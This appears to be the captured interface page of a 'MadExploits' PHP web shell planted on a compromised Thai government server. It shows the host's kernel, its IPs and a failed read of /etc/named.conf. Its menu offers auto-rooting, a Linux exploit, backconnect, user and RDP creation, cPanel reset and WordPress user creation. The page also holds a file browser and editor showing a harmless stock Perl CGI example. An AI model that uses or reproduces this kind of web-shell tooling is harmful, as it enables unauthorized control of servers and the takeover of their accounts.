Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
perl5 /
CGI /
examples /
[ HOME SHELL ]
Name
Size
Permission
Action
WORLD_WRITABLE
[ DIR ]
drwxr-xr-x
caution.xbm
741
B
-rw-r--r--
clickable_image.cgi
808
B
-rw-r--r--
cookie.cgi
2.21
KB
-rw-r--r--
crash.cgi
131
B
-rw-r--r--
customize.cgi
2.4
KB
-rw-r--r--
diff_upload.cgi
1.56
KB
-rw-r--r--
file_upload.cgi
1.95
KB
-rw-r--r--
frameset.cgi
2.03
KB
-rw-r--r--
index.html
3.41
KB
-rw-r--r--
internal_links.cgi
1019
B
-rw-r--r--
javascript.cgi
2.98
KB
-rw-r--r--
make_links.pl
196
B
-rw-r--r--
monty.cgi
2.04
KB
-rw-r--r--
multiple_forms.cgi
1.56
KB
-rw-r--r--
nph-clock.cgi
359
B
-rw-r--r--
nph-multipart.cgi
263
B
-rw-r--r--
popup.cgi
1
KB
-rw-r--r--
save_state.cgi
2.26
KB
-rw-r--r--
tryit.cgi
780
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : internal_links.cgi
#!/usr/local/bin/perl use CGI; $query = new CGI; # We generate a regular HTML file containing a very long list # and a popup menu that does nothing except to show that we # don't lose the state information. print $query->header; print $query->start_html("Internal Links Example"); print "<H1>Internal Links Example</H1>\n"; print "Click <cite>Submit Query</cite> to create a state. Then scroll down and", " click on any of the <cite>Jump to top</cite> links. This is not very exciting."; print "<A NAME=\"start\"></A>\n"; # an anchor point at the top # pick a default starting value; $query->param('amenu','FOO1') unless $query->param('amenu'); print $query->start_form; print $query->popup_menu('amenu',[('FOO1'..'FOO9')]); print $query->submit,$query->endform; # We create a long boring list for the purposes of illustration. $myself = $query->self_url; print "<OL>\n"; for (1..100) { print qq{<LI>List item #$_ <A HREF="$myself#start">Jump to top</A>\n}; } print "</OL>\n"; print $query->end_html;
Close